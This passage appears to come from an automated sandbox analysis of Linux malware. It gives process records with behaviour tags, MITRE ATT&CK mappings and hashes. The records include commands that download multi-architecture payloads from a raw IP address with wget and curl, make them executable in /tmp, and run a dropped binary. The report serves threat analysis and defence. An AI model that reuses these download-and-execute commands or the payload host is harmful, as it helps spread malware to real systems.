  - Changes its process name
  - Reads system network configuration
  PID:1633
  -
  /usr/bin/wget
  command: wget http://94.23.167.188/F331M3/feelme420.i586
  PID:1636
  -
  /usr/bin/curl
  command: curl -O http://94.23.167.188/F331M3/feelme420.i586
  - Writes file to tmp directory
  PID:1640
  -
  /bin/chmod
  command: chmod +x config-err-d1U8bY f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i486 feelme420.i586 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
  - File and Directory Permissions Modification
  PID:1642
  -
  /tmp/f331m3420
  command: ./f331m3420 feelme420.exploit
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Reads process memory
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1643
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
- File and Directory Permissions Modification (1)
  - Linux and Mac File and Directory Permissions Modification (1)
- Impair Defenses (1)
Downloads
-
- Filesize: 68KB
- MD5: 71b0c2e7cc122d6de4a481bea5ebc6d9
- SHA1: f982ae244188ddd93b797e9548e049b97d2f2c7f
- SHA256: de0eaed88adb239921c42f1f8038523d53c735f01992fe773f54e1d181750833
- SHA512: f38ed5895d7c420b15688de521df6fc394ae9e1690a5f3628f22bd6489dab21ec8e9fa6dcfca40082d5099763d10b680bba3b43ef6f71016132958aa9a0d7f43